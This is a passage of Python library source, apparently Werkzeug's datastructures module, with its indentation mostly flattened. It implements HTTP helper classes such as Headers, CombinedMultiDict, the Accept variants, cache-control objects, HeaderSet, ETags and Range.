returned_keys.add(ptr.key)
ptr = ptr.next
def listvalues(self):
for key, values in iterlists(self):
yield values
def add(self, key, value):
dict.setdefault(self, key, []).append(_omd_bucket(self, key, value))
def getlist(self, key, type=None):
try:
rv = dict.__getitem__(self, key)
except KeyError:
return []
if type is None:
return [x.value for x in rv]
result = []
for item in rv:
try:
result.append(type(item.value))
except ValueError:
pass
return result
def setlist(self, key, new_list):
self.poplist(key)
for value in new_list:
self.add(key, value)
def setlistdefault(self, key, default_list=None):
raise TypeError('setlistdefault is unsupported for '
'ordered multi dicts')
def update(self, mapping):
for key, value in iter_multi_items(mapping):
OrderedMultiDict.add(self, key, value)
def poplist(self, key):
buckets = dict.pop(self, key, ())
for bucket in buckets:
bucket.unlink(self)
return [x.value for x in buckets]
def pop(self, key, default=_missing):
try:
buckets = dict.pop(self, key)
except KeyError as e:
if default is not _missing:
return default
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return buckets[0].value
def popitem(self):
try:
key, buckets = dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return key, buckets[0].value
def popitemlist(self):
try:
key, buckets = dict.popitem(self)
except KeyError as e:
raise exceptions.BadRequestKeyError(str(e))
for bucket in buckets:
bucket.unlink(self)
return key, [x.value for x in buckets]
def _options_header_vkw(value, kw):
return dump_options_header(value, dict((k.replace('_', '-'), v)
for k, v in kw.items()))
def _unicodify_header_value(value):
if isinstance(value, bytes):
value = value.decode('latin-1')
if not isinstance(value, text_type):
value = text_type(value)
return value
@native_itermethods(['keys', 'values', 'items'])
class Headers(object):
"""An object that stores some headers. It has a dict-like interface
but is ordered and can store the same keys multiple times.
This data structure is useful if you want a nicer way to handle WSGI
headers which are stored as tuples in a list.
From Werkzeug 0.3 onwards, the :exc:`KeyError` raised by this class is
also a subclass of the :class:`~exceptions.BadRequest` HTTP exception
and will render a page for a ``400 BAD REQUEST`` if caught in a
catch-all for HTTP exceptions.
Headers is mostly compatible with the Python :class:`wsgiref.headers.Headers`
class, with the exception of `__getitem__`. :mod:`wsgiref` will return
`None` for ``headers['missing']``, whereas :class:`Headers` will raise
a :class:`KeyError`.
To create a new :class:`Headers` object pass it a list or dict of headers
which are used as default values. This does not reuse the list passed
to the constructor for internal usage.
:param defaults: The list of default values for the :class:`Headers`.
.. versionchanged:: 0.9
This data structure now stores unicode values similar to how the
multi dicts do it. The main difference is that bytes can be set as
well which will automatically be latin1 decoded.
.. versionchanged:: 0.9
The :meth:`linked` function was removed without replacement as it
was an API that does not support the changes to the encoding model.
"""
def __init__(self, defaults=None):
self._list = []
if defaults is not None:
if isinstance(defaults, (list, Headers)):
self._list.extend(defaults)
else:
self.extend(defaults)
def __getitem__(self, key, _get_mode=False):
if not _get_mode:
if isinstance(key, integer_types):
return self._list[key]
elif isinstance(key, slice):
return self.__class__(self._list[key])
if not isinstance(key, string_types):
raise exceptions.BadRequestKeyError(key)
ikey = key.lower()
for k, v in self._list:
if k.lower() == ikey:
return v
# micro optimization: if we are in get mode we will catch that
# exception one stack level down so we can raise a standard
# key error instead of our special one.
if _get_mode:
raise KeyError()
raise exceptions.BadRequestKeyError(key)
def __eq__(self, other):
return other.__class__ is self.__class__ and \
set(other._list) == set(self._list)
def __ne__(self, other):
return not self.__eq__(other)
def get(self, key, default=None, type=None, as_bytes=False):
"""Return the default value if the requested data doesn't exist.
If `type` is provided and is a callable it should convert the value,
return it or raise a :exc:`ValueError` if that is not possible. In
this case the function will return the default as if the value was not
found:
>>> d = Headers([('Content-Length', '42')])
>>> d.get('Content-Length', type=int)
42
If a headers object is bound you must not add unicode strings
because no encoding takes place.
.. versionadded:: 0.9
Added support for `as_bytes`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key can't
be looked up. If not further specified `None` is
returned.
:param type: A callable that is used to cast the value in the
:class:`Headers`. If a :exc:`ValueError` is raised
by this callable the default value is returned.
:param as_bytes: return bytes instead of unicode strings.
"""
try:
rv = self.__getitem__(key, _get_mode=True)
except KeyError:
return default
if as_bytes:
rv = rv.encode('latin1')
if type is None:
return rv
try:
return type(rv)
except ValueError:
return default
def getlist(self, key, type=None, as_bytes=False):
"""Return the list of items for a given key. If that key is not in the
:class:`Headers`, the return value will be an empty list. Just as
:meth:`get` :meth:`getlist` accepts a `type` parameter. All items will
be converted with the callable defined there.
.. versionadded:: 0.9
Added support for `as_bytes`.
:param key: The key to be looked up.
:param type: A callable that is used to cast the value in the
:class:`Headers`. If a :exc:`ValueError` is raised
by this callable the value will be removed from the list.
:return: a :class:`list` of all the values for the key.
:param as_bytes: return bytes instead of unicode strings.
"""
ikey = key.lower()
result = []
for k, v in self:
if k.lower() == ikey:
if as_bytes:
v = v.encode('latin1')
if type is not None:
try:
v = type(v)
except ValueError:
continue
result.append(v)
return result
def get_all(self, name):
"""Return a list of all the values for the named field.
This method is compatible with the :mod:`wsgiref`
:meth:`~wsgiref.headers.Headers.get_all` method.
"""
return self.getlist(name)
def items(self, lower=False):
for key, value in self:
if lower:
key = key.lower()
yield key, value
def keys(self, lower=False):
for key, _ in iteritems(self, lower):
yield key
def values(self):
for _, value in iteritems(self):
yield value
def extend(self, iterable):
"""Extend the headers with a dict or an iterable yielding keys and
values.
"""
if isinstance(iterable, dict):
for key, value in iteritems(iterable):
if isinstance(value, (tuple, list)):
for v in value:
self.add(key, v)
else:
self.add(key, value)
else:
for key, value in iterable:
self.add(key, value)
def __delitem__(self, key, _index_operation=True):
if _index_operation and isinstance(key, (integer_types, slice)):
del self._list[key]
return
key = key.lower()
new = []
for k, v in self._list:
if k.lower() != key:
new.append((k, v))
self._list[:] = new
def remove(self, key):
"""Remove a key.
:param key: The key to be removed.
"""
return self.__delitem__(key, _index_operation=False)
def pop(self, key=None, default=_missing):
"""Removes and returns a key or index.
:param key: The key to be popped. If this is an integer the item at
that position is removed, if it's a string the value for
that key is. If the key is omitted or `None` the last
item is removed.
:return: an item.
"""
if key is None:
return self._list.pop()
if isinstance(key, integer_types):
return self._list.pop(key)
try:
rv = self[key]
self.remove(key)
except KeyError:
if default is not _missing:
return default
raise
return rv
def popitem(self):
"""Removes a key or index and returns a (key, value) item."""
return self.pop()
def __contains__(self, key):
"""Check if a key is present."""
try:
self.__getitem__(key, _get_mode=True)
except KeyError:
return False
return True
has_key = __contains__
def __iter__(self):
"""Yield ``(key, value)`` tuples."""
return iter(self._list)
def __len__(self):
return len(self._list)
def add(self, _key, _value, **kw):
"""Add a new header tuple to the list.
Keyword arguments can specify additional parameters for the header
value, with underscores converted to dashes::
>>> d = Headers()
>>> d.add('Content-Type', 'text/plain')
>>> d.add('Content-Disposition', 'attachment', filename='foo.png')
The keyword argument dumping uses :func:`dump_options_header`
behind the scenes.
.. versionadded:: 0.4.1
keyword arguments were added for :mod:`wsgiref` compatibility.
"""
if kw:
_value = _options_header_vkw(_value, kw)
_value = _unicodify_header_value(_value)
self._validate_value(_value)
self._list.append((_key, _value))
def _validate_value(self, value):
if not isinstance(value, text_type):
raise TypeError('Value should be unicode.')
if u'\n' in value or u'\r' in value:
raise ValueError('Detected newline in header value. This is '
'a potential security problem')
def add_header(self, _key, _value, **_kw):
"""Add a new header tuple to the list.
An alias for :meth:`add` for compatibility with the :mod:`wsgiref`
:meth:`~wsgiref.headers.Headers.add_header` method.
"""
self.add(_key, _value, **_kw)
def clear(self):
"""Clears all headers."""
del self._list[:]
def set(self, _key, _value, **kw):
"""Remove all header tuples for `key` and add a new one. The newly
added key either appears at the end of the list if there was no
entry or replaces the first one.
Keyword arguments can specify additional parameters for the header
value, with underscores converted to dashes. See :meth:`add` for
more information.
.. versionchanged:: 0.6.1
:meth:`set` now accepts the same arguments as :meth:`add`.
:param key: The key to be inserted.
:param value: The value to be inserted.
"""
if kw:
_value = _options_header_vkw(_value, kw)
_value = _unicodify_header_value(_value)
self._validate_value(_value)
if not self._list:
self._list.append((_key, _value))
return
listiter = iter(self._list)
ikey = _key.lower()
for idx, (old_key, old_value) in enumerate(listiter):
if old_key.lower() == ikey:
                # replace first occurrence
self._list[idx] = (_key, _value)
break
else:
self._list.append((_key, _value))
return
self._list[idx + 1:] = [t for t in listiter if t[0].lower() != ikey]
def setdefault(self, key, value):
"""Returns the value for the key if it is in the dict, otherwise it
returns `default` and sets that value for `key`.
:param key: The key to be looked up.
:param default: The default value to be returned if the key is not
in the dict. If not further specified it's `None`.
"""
if key in self:
return self[key]
self.set(key, value)
return value
def __setitem__(self, key, value):
"""Like :meth:`set` but also supports index/slice based setting."""
if isinstance(key, (slice, integer_types)):
if isinstance(key, integer_types):
value = [value]
value = [(k, _unicodify_header_value(v)) for (k, v) in value]
[self._validate_value(v) for (k, v) in value]
if isinstance(key, integer_types):
self._list[key] = value[0]
else:
self._list[key] = value
else:
self.set(key, value)
def to_list(self, charset='iso-8859-1'):
"""Convert the headers into a list suitable for WSGI."""
from warnings import warn
warn(DeprecationWarning('Method removed, use to_wsgi_list instead'),
stacklevel=2)
return self.to_wsgi_list()
def to_wsgi_list(self):
"""Convert the headers into a list suitable for WSGI.
The values are byte strings in Python 2 converted to latin1 and unicode
strings in Python 3 for the WSGI server to encode.
:return: list
"""
if PY2:
return [(to_native(k), v.encode('latin1')) for k, v in self]
return list(self)
def copy(self):
return self.__class__(self._list)
def __copy__(self):
return self.copy()
def __str__(self):
"""Returns formatted headers suitable for HTTP transmission."""
strs = []
for key, value in self.to_wsgi_list():
strs.append('%s: %s' % (key, value))
strs.append('\r\n')
return '\r\n'.join(strs)
def __repr__(self):
return '%s(%r)' % (
self.__class__.__name__,
list(self)
)
class ImmutableHeadersMixin(object):
"""Makes a :class:`Headers` immutable. We do not mark them as
    hashable though since the only use case for this data structure
in Werkzeug is a view on a mutable structure.
.. versionadded:: 0.5
:private:
"""
def __delitem__(self, key):
is_immutable(self)
def __setitem__(self, key, value):
is_immutable(self)
set = __setitem__
def add(self, item):
is_immutable(self)
remove = add_header = add
def extend(self, iterable):
is_immutable(self)
def insert(self, pos, value):
is_immutable(self)
def pop(self, index=-1):
is_immutable(self)
def popitem(self):
is_immutable(self)
def setdefault(self, key, default):
is_immutable(self)
class EnvironHeaders(ImmutableHeadersMixin, Headers):
"""Read only version of the headers from a WSGI environment. This
provides the same interface as `Headers` and is constructed from
a WSGI environment.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for
HTTP exceptions.
"""
def __init__(self, environ):
self.environ = environ
def __eq__(self, other):
return self.environ is other.environ
def __getitem__(self, key, _get_mode=False):
# _get_mode is a no-op for this class as there is no index but
# used because get() calls it.
key = key.upper().replace('-', '_')
if key in ('CONTENT_TYPE', 'CONTENT_LENGTH'):
return _unicodify_header_value(self.environ[key])
return _unicodify_header_value(self.environ['HTTP_' + key])
def __len__(self):
# the iter is necessary because otherwise list calls our
# len which would call list again and so forth.
return len(list(iter(self)))
def __iter__(self):
for key, value in iteritems(self.environ):
if key.startswith('HTTP_') and key not in \
('HTTP_CONTENT_TYPE', 'HTTP_CONTENT_LENGTH'):
yield (key[5:].replace('_', '-').title(),
_unicodify_header_value(value))
elif key in ('CONTENT_TYPE', 'CONTENT_LENGTH'):
yield (key.replace('_', '-').title(),
_unicodify_header_value(value))
def copy(self):
raise TypeError('cannot create %r copies' % self.__class__.__name__)
@native_itermethods(['keys', 'values', 'items', 'lists', 'listvalues'])
class CombinedMultiDict(ImmutableMultiDictMixin, MultiDict):
"""A read only :class:`MultiDict` that you can pass multiple :class:`MultiDict`
instances as sequence and it will combine the return values of all wrapped
dicts:
>>> from werkzeug.datastructures import CombinedMultiDict, MultiDict
>>> post = MultiDict([('foo', 'bar')])
>>> get = MultiDict([('blub', 'blah')])
>>> combined = CombinedMultiDict([get, post])
>>> combined['foo']
'bar'
>>> combined['blub']
'blah'
This works for all read operations and will raise a `TypeError` for
methods that usually change data which isn't possible.
From Werkzeug 0.3 onwards, the `KeyError` raised by this class is also a
subclass of the :exc:`~exceptions.BadRequest` HTTP exception and will
render a page for a ``400 BAD REQUEST`` if caught in a catch-all for HTTP
exceptions.
"""
def __reduce_ex__(self, protocol):
return type(self), (self.dicts,)
def __init__(self, dicts=None):
self.dicts = dicts or []
@classmethod
def fromkeys(cls):
raise TypeError('cannot create %r instances by fromkeys' %
cls.__name__)
def __getitem__(self, key):
for d in self.dicts:
if key in d:
return d[key]
raise exceptions.BadRequestKeyError(key)
def get(self, key, default=None, type=None):
for d in self.dicts:
if key in d:
if type is not None:
try:
return type(d[key])
except ValueError:
continue
return d[key]
return default
def getlist(self, key, type=None):
rv = []
for d in self.dicts:
rv.extend(d.getlist(key, type))
return rv
def keys(self):
rv = set()
for d in self.dicts:
rv.update(d.keys())
return iter(rv)
__iter__ = keys
def items(self, multi=False):
found = set()
for d in self.dicts:
for key, value in iteritems(d, multi):
if multi:
yield key, value
elif key not in found:
found.add(key)
yield key, value
def values(self):
for key, value in iteritems(self):
yield value
def lists(self):
rv = {}
for d in self.dicts:
for key, values in iterlists(d):
rv.setdefault(key, []).extend(values)
return iteritems(rv)
def listvalues(self):
return (x[1] for x in self.lists())
def copy(self):
"""Return a shallow copy of this object."""
return self.__class__(self.dicts[:])
def to_dict(self, flat=True):
"""Return the contents as regular dict. If `flat` is `True` the
returned dict will only have the first item present, if `flat` is
`False` all values will be returned as lists.
:param flat: If set to `False` the dict returned will have lists
with all the values in it. Otherwise it will only
contain the first item for each key.
:return: a :class:`dict`
"""
rv = {}
for d in reversed(self.dicts):
rv.update(d.to_dict(flat))
return rv
def __len__(self):
return len(self.keys())
def __contains__(self, key):
for d in self.dicts:
if key in d:
return True
return False
has_key = __contains__
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, self.dicts)
class FileMultiDict(MultiDict):
"""A special :class:`MultiDict` that has convenience methods to add
files to it. This is used for :class:`EnvironBuilder` and generally
useful for unittesting.
.. versionadded:: 0.5
"""
def add_file(self, name, file, filename=None, content_type=None):
"""Adds a new file to the dict. `file` can be a file name or
a :class:`file`-like or a :class:`FileStorage` object.
:param name: the name of the field.
:param file: a filename or :class:`file`-like object
:param filename: an optional filename
:param content_type: an optional content type
"""
if isinstance(file, FileStorage):
value = file
else:
if isinstance(file, string_types):
if filename is None:
filename = file
file = open(file, 'rb')
if filename and content_type is None:
content_type = mimetypes.guess_type(filename)[0] or \
'application/octet-stream'
value = FileStorage(file, filename, name, content_type)
self.add(name, value)
class ImmutableDict(ImmutableDictMixin, dict):
"""An immutable :class:`dict`.
.. versionadded:: 0.5
"""
def __repr__(self):
return '%s(%s)' % (
self.__class__.__name__,
dict.__repr__(self),
)
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return dict(self)
def __copy__(self):
return self
class ImmutableMultiDict(ImmutableMultiDictMixin, MultiDict):
"""An immutable :class:`MultiDict`.
.. versionadded:: 0.5
"""
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return MultiDict(self)
def __copy__(self):
return self
class ImmutableOrderedMultiDict(ImmutableMultiDictMixin, OrderedMultiDict):
"""An immutable :class:`OrderedMultiDict`.
.. versionadded:: 0.6
"""
def _iter_hashitems(self):
return enumerate(iteritems(self, multi=True))
def copy(self):
"""Return a shallow mutable copy of this object. Keep in mind that
the standard library's :func:`copy` function is a no-op for this class
like for any other python immutable type (eg: :class:`tuple`).
"""
return OrderedMultiDict(self)
def __copy__(self):
return self
@native_itermethods(['values'])
class Accept(ImmutableList):
"""An :class:`Accept` object is just a list subclass for lists of
``(value, quality)`` tuples. It is automatically sorted by quality.
All :class:`Accept` objects work similar to a list but provide extra
functionality for working with the data. Containment checks are
normalized to the rules of that header:
>>> a = CharsetAccept([('ISO-8859-1', 1), ('utf-8', 0.7)])
>>> a.best
'ISO-8859-1'
>>> 'iso-8859-1' in a
True
>>> 'UTF8' in a
True
>>> 'utf7' in a
False
To get the quality for an item you can use normal item lookup:
>>> print a['utf-8']
0.7
>>> a['utf7']
0
.. versionchanged:: 0.5
:class:`Accept` objects are forced immutable now.
"""
def __init__(self, values=()):
if values is None:
list.__init__(self)
self.provided = False
elif isinstance(values, Accept):
self.provided = values.provided
list.__init__(self, values)
else:
self.provided = True
values = [(a, b) for b, a in values]
values.sort()
values.reverse()
list.__init__(self, [(a, b) for b, a in values])
def _value_matches(self, value, item):
"""Check if a value matches a given accept item."""
return item == '*' or item.lower() == value.lower()
def __getitem__(self, key):
"""Besides index lookup (getting item n) you can also pass it a string
to get the quality for the item. If the item is not in the list, the
returned quality is ``0``.
"""
if isinstance(key, string_types):
return self.quality(key)
return list.__getitem__(self, key)
def quality(self, key):
"""Returns the quality of the key.
.. versionadded:: 0.6
In previous versions you had to use the item-lookup syntax
(eg: ``obj[key]`` instead of ``obj.quality(key)``)
"""
for item, quality in self:
if self._value_matches(key, item):
return quality
return 0
def __contains__(self, value):
for item, quality in self:
if self._value_matches(value, item):
return True
return False
def __repr__(self):
return '%s([%s])' % (
self.__class__.__name__,
', '.join('(%r, %s)' % (x, y) for x, y in self)
)
def index(self, key):
"""Get the position of an entry or raise :exc:`ValueError`.
:param key: The key to be looked up.
.. versionchanged:: 0.5
This used to raise :exc:`IndexError`, which was inconsistent
with the list API.
"""
if isinstance(key, string_types):
for idx, (item, quality) in enumerate(self):
if self._value_matches(key, item):
return idx
raise ValueError(key)
return list.index(self, key)
def find(self, key):
"""Get the position of an entry or return -1.
:param key: The key to be looked up.
"""
try:
return self.index(key)
except ValueError:
return -1
def values(self):
"""Iterate over all values."""
for item in self:
yield item[0]
def to_header(self):
"""Convert the header set into an HTTP header string."""
result = []
for value, quality in self:
if quality != 1:
value = '%s;q=%s' % (value, quality)
result.append(value)
return ','.join(result)
def __str__(self):
return self.to_header()
def best_match(self, matches, default=None):
"""Returns the best match from a list of possible matches based
on the quality of the client. If two items have the same quality,
the one is returned that comes first.
:param matches: a list of matches to check for
:param default: the value that is returned if none match
"""
best_quality = -1
result = default
for server_item in matches:
for client_item, quality in self:
if quality <= best_quality:
break
if self._value_matches(server_item, client_item):
best_quality = quality
result = server_item
return result
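    # An illustrative call (not part of the class):
    #   MIMEAccept([('text/html', 1), ('application/json', 0.5)]) \
    #       .best_match(['application/json', 'text/html'])  # -> 'text/html'
    # text/html wins because its client quality (1) beats application/json (0.5).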
@property
def best(self):
"""The best match as value."""
if self:
return self[0][0]
class MIMEAccept(Accept):
"""Like :class:`Accept` but with special methods and behavior for
mimetypes.
"""
def _value_matches(self, value, item):
def _normalize(x):
x = x.lower()
return x == '*' and ('*', '*') or x.split('/', 1)
# this is from the application which is trusted. to avoid developer
# frustration we actually check these for valid values
if '/' not in value:
raise ValueError('invalid mimetype %r' % value)
value_type, value_subtype = _normalize(value)
if value_type == '*' and value_subtype != '*':
raise ValueError('invalid mimetype %r' % value)
if '/' not in item:
return False
item_type, item_subtype = _normalize(item)
if item_type == '*' and item_subtype != '*':
return False
return (
(item_type == item_subtype == '*' or
value_type == value_subtype == '*') or
(item_type == value_type and (item_subtype == '*' or
value_subtype == '*' or
item_subtype == value_subtype))
)
@property
def accept_html(self):
"""True if this object accepts HTML."""
return (
'text/html' in self or
'application/xhtml+xml' in self or
self.accept_xhtml
)
@property
def accept_xhtml(self):
"""True if this object accepts XHTML."""
return (
'application/xhtml+xml' in self or
'application/xml' in self
)
@property
def accept_json(self):
"""True if this object accepts JSON."""
return 'application/json' in self
class LanguageAccept(Accept):
"""Like :class:`Accept` but with normalization for languages."""
def _value_matches(self, value, item):
def _normalize(language):
return _locale_delim_re.split(language.lower())
return item == '*' or _normalize(value) == _normalize(item)
class CharsetAccept(Accept):
"""Like :class:`Accept` but with normalization for charsets."""
def _value_matches(self, value, item):
def _normalize(name):
try:
return codecs.lookup(name).name
except LookupError:
return name.lower()
return item == '*' or _normalize(value) == _normalize(item)
def cache_property(key, empty, type):
"""Return a new property object for a cache header. Useful if you
want to add support for a cache extension in a subclass."""
return property(lambda x: x._get_cache_value(key, empty, type),
lambda x, v: x._set_cache_value(key, v, type),
lambda x: x._del_cache_value(key),
'accessor for %r' % key)
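# A sketch of the subclassing hook mentioned above.  The directive name
# 'stale-while-revalidate' is only an example here, not something this module
# defines:
#
#   class MyResponseCacheControl(ResponseCacheControl):
#       stale_while_revalidate = cache_property('stale-while-revalidate',
#                                               None, int)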
class _CacheControl(UpdateDictMixin, dict):
"""Subclass of a dict that stores values for a Cache-Control header. It
has accessors for all the cache-control directives specified in RFC 2616.
The class does not differentiate between request and response directives.
Because the cache-control directives in the HTTP header use dashes the
python descriptors use underscores for that.
To get a header of the :class:`CacheControl` object again you can convert
the object into a string or call the :meth:`to_header` method. If you plan
to subclass it and add your own items have a look at the sourcecode for
that class.
.. versionchanged:: 0.4
Setting `no_cache` or `private` to boolean `True` will set the implicit
none-value which is ``*``:
>>> cc = ResponseCacheControl()
>>> cc.no_cache = True
>>> cc
<ResponseCacheControl 'no-cache'>
>>> cc.no_cache
'*'
>>> cc.no_cache = None
>>> cc
<ResponseCacheControl ''>
In versions before 0.5 the behavior documented here affected the now
no longer existing `CacheControl` class.
"""
no_cache = cache_property('no-cache', '*', None)
no_store = cache_property('no-store', None, bool)
max_age = cache_property('max-age', -1, int)
no_transform = cache_property('no-transform', None, None)
def __init__(self, values=(), on_update=None):
dict.__init__(self, values or ())
self.on_update = on_update
self.provided = values is not None
def _get_cache_value(self, key, empty, type):
"""Used internally by the accessor properties."""
if type is bool:
return key in self
if key in self:
value = self[key]
if value is None:
return empty
elif type is not None:
try:
value = type(value)
except ValueError:
pass
return value
def _set_cache_value(self, key, value, type):
"""Used internally by the accessor properties."""
if type is bool:
if value:
self[key] = None
else:
self.pop(key, None)
else:
if value is None:
self.pop(key)
elif value is True:
self[key] = None
else:
self[key] = value
def _del_cache_value(self, key):
"""Used internally by the accessor properties."""
if key in self:
del self[key]
def to_header(self):
"""Convert the stored values into a cache control header."""
return dump_header(self)
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (
self.__class__.__name__,
self.to_header()
)
class RequestCacheControl(ImmutableDictMixin, _CacheControl):
"""A cache control for requests. This is immutable and gives access
to all the request-relevant cache control headers.
To get a header of the :class:`RequestCacheControl` object again you can
convert the object into a string or call the :meth:`to_header` method. If
you plan to subclass it and add your own items have a look at the sourcecode
for that class.
.. versionadded:: 0.5
In previous versions a `CacheControl` class existed that was used
both for request and response.
"""
max_stale = cache_property('max-stale', '*', int)
min_fresh = cache_property('min-fresh', '*', int)
no_transform = cache_property('no-transform', None, None)
only_if_cached = cache_property('only-if-cached', None, bool)
class ResponseCacheControl(_CacheControl):
"""A cache control for responses. Unlike :class:`RequestCacheControl`
this is mutable and gives access to response-relevant cache control
headers.
To get a header of the :class:`ResponseCacheControl` object again you can
convert the object into a string or call the :meth:`to_header` method. If
you plan to subclass it and add your own items have a look at the sourcecode
for that class.
.. versionadded:: 0.5
In previous versions a `CacheControl` class existed that was used
both for request and response.
"""
public = cache_property('public', None, bool)
private = cache_property('private', '*', None)
must_revalidate = cache_property('must-revalidate', None, bool)
proxy_revalidate = cache_property('proxy-revalidate', None, bool)
s_maxage = cache_property('s-maxage', None, None)
# attach cache_property to the _CacheControl as staticmethod
# so that others can reuse it.
_CacheControl.cache_property = staticmethod(cache_property)
class CallbackDict(UpdateDictMixin, dict):
"""A dict that calls a function passed every time something is changed.
The function is passed the dict instance.
"""
def __init__(self, initial=None, on_update=None):
dict.__init__(self, initial or ())
self.on_update = on_update
def __repr__(self):
return '<%s %s>' % (
self.__class__.__name__,
dict.__repr__(self)
)
class HeaderSet(object):
"""Similar to the :class:`ETags` class this implements a set-like structure.
Unlike :class:`ETags` this is case insensitive and used for vary, allow, and
content-language headers.
If not constructed using the :func:`parse_set_header` function the
instantiation works like this:
>>> hs = HeaderSet(['foo', 'bar', 'baz'])
>>> hs
HeaderSet(['foo', 'bar', 'baz'])
"""
def __init__(self, headers=None, on_update=None):
self._headers = list(headers or ())
self._set = set([x.lower() for x in self._headers])
self.on_update = on_update
def add(self, header):
"""Add a new header to the set."""
self.update((header,))
def remove(self, header):
"""Remove a header from the set. This raises an :exc:`KeyError` if the
header is not in the set.
.. versionchanged:: 0.5
            In older versions an :exc:`IndexError` was raised instead of a
:exc:`KeyError` if the object was missing.
:param header: the header to be removed.
"""
key = header.lower()
if key not in self._set:
raise KeyError(header)
self._set.remove(key)
        for idx, item in enumerate(self._headers):
            if item.lower() == key:
                del self._headers[idx]
                break
if self.on_update is not None:
self.on_update(self)
def update(self, iterable):
"""Add all the headers from the iterable to the set.
:param iterable: updates the set with the items from the iterable.
"""
inserted_any = False
for header in iterable:
key = header.lower()
if key not in self._set:
self._headers.append(header)
self._set.add(key)
inserted_any = True
if inserted_any and self.on_update is not None:
self.on_update(self)
def discard(self, header):
"""Like :meth:`remove` but ignores errors.
:param header: the header to be discarded.
"""
try:
return self.remove(header)
except KeyError:
pass
def find(self, header):
"""Return the index of the header in the set or return -1 if not found.
:param header: the header to be looked up.
"""
header = header.lower()
for idx, item in enumerate(self._headers):
if item.lower() == header:
return idx
return -1
def index(self, header):
"""Return the index of the header in the set or raise an
:exc:`IndexError`.
:param header: the header to be looked up.
"""
rv = self.find(header)
if rv < 0:
raise IndexError(header)
return rv
def clear(self):
"""Clear the set."""
self._set.clear()
del self._headers[:]
if self.on_update is not None:
self.on_update(self)
def as_set(self, preserve_casing=False):
"""Return the set as real python set type. When calling this, all
the items are converted to lowercase and the ordering is lost.
:param preserve_casing: if set to `True` the items in the set returned
will have the original case like in the
:class:`HeaderSet`, otherwise they will
be lowercase.
"""
if preserve_casing:
return set(self._headers)
return set(self._set)
def to_header(self):
"""Convert the header set into an HTTP header string."""
return ', '.join(map(quote_header_value, self._headers))
def __getitem__(self, idx):
return self._headers[idx]
def __delitem__(self, idx):
rv = self._headers.pop(idx)
self._set.remove(rv.lower())
if self.on_update is not None:
self.on_update(self)
def __setitem__(self, idx, value):
old = self._headers[idx]
self._set.remove(old.lower())
self._headers[idx] = value
self._set.add(value.lower())
if self.on_update is not None:
self.on_update(self)
def __contains__(self, header):
return header.lower() in self._set
def __len__(self):
return len(self._set)
def __iter__(self):
return iter(self._headers)
def __nonzero__(self):
return bool(self._set)
def __str__(self):
return self.to_header()
def __repr__(self):
return '%s(%r)' % (
self.__class__.__name__,
self._headers
)
class ETags(object):
"""A set that can be used to check if one etag is present in a collection
of etags.
"""
def __init__(self, strong_etags=None, weak_etags=None, star_tag=False):
self._strong = frozenset(not star_tag and strong_etags or ())
self._weak = frozenset(weak_etags or ())
self.star_tag = star_tag
def as_set(self, include_weak=False):
"""Convert the `ETags` object into a python set. Per default all the
weak etags are not part of this set."""
rv = set(self._strong)
if include_weak:
rv.update(self._weak)
return rv
def is_weak(self, etag):
"""Check if an etag is weak."""
return etag in self._weak
def contains_weak(self, etag):
"""Check if an etag is part of the set including weak and strong tags."""
return self.is_weak(etag) or self.contains(etag)
def contains(self, etag):
"""Check if an etag is part of the set ignoring weak tags.
It is also possible to use the ``in`` operator.
"""
if self.star_tag:
return True
return etag in self._strong
def contains_raw(self, etag):
"""When passed a quoted tag it will check if this tag is part of the
set. If the tag is weak it is checked against weak and strong tags,
otherwise strong only."""
etag, weak = unquote_etag(etag)
if weak:
return self.contains_weak(etag)
return self.contains(etag)
def to_header(self):
"""Convert the etags set into a HTTP header string."""
if self.star_tag:
return '*'
return ', '.join(
['"%s"' % x for x in self._strong] +
['w/"%s"' % x for x in self._weak]
)
def __call__(self, etag=None, data=None, include_weak=False):
if [etag, data].count(None) != 1:
raise TypeError('either tag or data required, but at least one')
if etag is None:
etag = generate_etag(data)
if include_weak:
if etag in self._weak:
return True
return etag in self._strong
def __nonzero__(self):
return bool(self.star_tag or self._strong or self._weak)
def __str__(self):
return self.to_header()
def __iter__(self):
return iter(self._strong)
def __contains__(self, etag):
return self.contains(etag)
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
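# Hedged usage sketch (not in the original source): an ETags collection, as
# returned e.g. by parse_etags(), supports strong and weak membership checks:
#
#     etags = ETags(strong_etags=['abc'], weak_etags=['def'])
#     'abc' in etags                 # True  (strong match via contains())
#     etags.contains_weak('def')     # True  (weak tags included)
#     etags.contains_raw('w/"def"')  # True, quoted/weak form is unquoted first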
class IfRange(object):
"""Very simple object that represents the `If-Range` header in parsed
form. It will either have neither a etag or date or one of either but
never both.
.. versionadded:: 0.7
"""
def __init__(self, etag=None, date=None):
#: The etag parsed and unquoted. Ranges always operate on strong
#: etags so the weakness information is not necessary.
self.etag = etag
#: The date in parsed format or `None`.
self.date = date
def to_header(self):
"""Converts the object back into an HTTP header."""
if self.date is not None:
return http_date(self.date)
if self.etag is not None:
return quote_etag(self.etag)
return ''
def __str__(self):
return self.to_header()
def __repr__(self):
return '<%s %r>' % (self.__class__.__name__, str(self))
class Range(object):
"""Represents a range header. All the methods are only supporting bytes
as unit. It does store multiple ranges but :meth:`range_for_length` will
only work if only one range is provided.
.. versionadded:: 0.7
"""
def __init__(self, units, ranges):
#: The units of this range. Usually "bytes".
self.units = units
#: A list of ``(begin, end)`` tuples for the range header provided.
#: The ranges are non-inclusive.
self.ranges = ranges
def range_for_length(self, length):
"""If the range is for bytes, the length is not None and there is
exactly one range and it is satisfiable it returns a ``(start, stop)``
tuple, otherwise `None`.
"""
if self.units != 'bytes' or length is None or len(self.ranges) != 1:
return None
start, end = self.ranges[0]
if end is None:
end = length
if start < 0:
start += length
